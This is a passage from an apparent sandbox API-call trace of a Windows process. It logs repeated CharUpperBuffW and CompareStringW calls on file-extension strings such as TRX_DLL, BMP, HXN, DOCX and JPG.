lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.578] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.578] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.578] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.578] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="TRX_DLL", cchCount2=7) returned 1 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODT", cchCount1=3, lpString2="BMP", cchCount2=3) returned 3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="BMP", cchCount2=3) returned 3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ACRODATA", cchCount1=8, lpString2="BMP", cchCount2=3) returned 1 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOC", cchCount1=3, lpString2="BMP", cchCount2=3) returned 3 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="BMP", cchCount2=3) returned 3 [0111.580] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODS", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0111.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOC", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0111.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GRL", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0111.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPG", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0111.588] CharUpperBuffW (in: lpsz="HxW", cchLength=0x3 | out: lpsz="HXW") returned 0x3 [0111.588] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXW", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0111.588] CharUpperBuffW (in: lpsz="HxW", cchLength=0x3 | out: lpsz="HXW") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODS", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="HXW", cchCount2=3) returned 1 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HXN", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0111.589] CharUpperBuffW (in: lpsz="HxW", cchLength=0x3 | out: lpsz="HXW") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXW", cchCount1=3, lpString2="HXW", cchCount2=3) returned 2 [0111.589] CharUpperBuffW (in: lpsz="HxH", cchLength=0x3 | out: lpsz="HXH") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXH", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0111.589] CharUpperBuffW (in: lpsz="HxH", cchLength=0x3 | out: lpsz="HXH") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPG", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="HXH", cchCount2=3) returned 1 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HXN", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GRL", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0111.589] CharUpperBuffW (in: lpsz="HxD", cchLength=0x3 | out: lpsz="HXD") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXD", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0111.589] CharUpperBuffW (in: lpsz="HxD", cchLength=0x3 | out: lpsz="HXD") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPG", cchCount1=3, lpString2="HXD", cchCount2=3) returned 3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="HXD", cchCount2=3) returned 1 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HXH", cchCount1=3, lpString2="HXD", cchCount2=3) returned 3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GRL", cchCount1=3, lpString2="HXD", cchCount2=3) returned 1 [0111.589] CharUpperBuffW (in: lpsz="Lck", cchLength=0x3 | out: lpsz="LCK") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="LCK", cchCount1=3, lpString2="HXD", cchCount2=3) returned 3 [0111.589] CharUpperBuffW (in: lpsz="Lck", cchLength=0x3 | out: lpsz="LCK") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HXW", cchCount1=3, lpString2="LCK", cchCount2=3) returned 1 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PNG", cchCount1=3, lpString2="LCK", cchCount2=3) returned 3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODS", cchCount1=3, lpString2="LCK", cchCount2=3) returned 3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPG", cchCount1=3, lpString2="LCK", cchCount2=3) returned 1 [0111.589] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="LCK", cchCount2=3) returned 1 [0111.589] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPG", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GRL", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HXH", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.589] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxl", cchLength=0x3 | out: lpsz="HXL") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXL", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0111.591] CharUpperBuffW (in: lpsz="hxl", cchLength=0x3 | out: lpsz="HXL") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPG", cchCount1=3, lpString2="HXL", cchCount2=3) returned 3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GRL", cchCount1=3, lpString2="HXL", cchCount2=3) returned 1 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HXH", cchCount1=3, lpString2="HXL", cchCount2=3) returned 1 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HXN", cchCount1=3, lpString2="HXL", cchCount2=3) returned 3 [0111.591] CharUpperBuffW (in: lpsz="rsm", cchLength=0x3 | out: lpsz="RSM") returned 0x3 [0111.591] CharUpperBuffW (in: lpsz="rsm", cchLength=0x3 | out: lpsz="RSM") returned 0x3 [0111.591] CharUpperBuffW (in: lpsz="rsm", cchLength=0x3 | out: lpsz="RSM") returned 0x3 [0111.591] CharUpperBuffW (in: lpsz="rsm", cchLength=0x3 | out: lpsz="RSM") returned 0x3 [0111.591] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.591] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 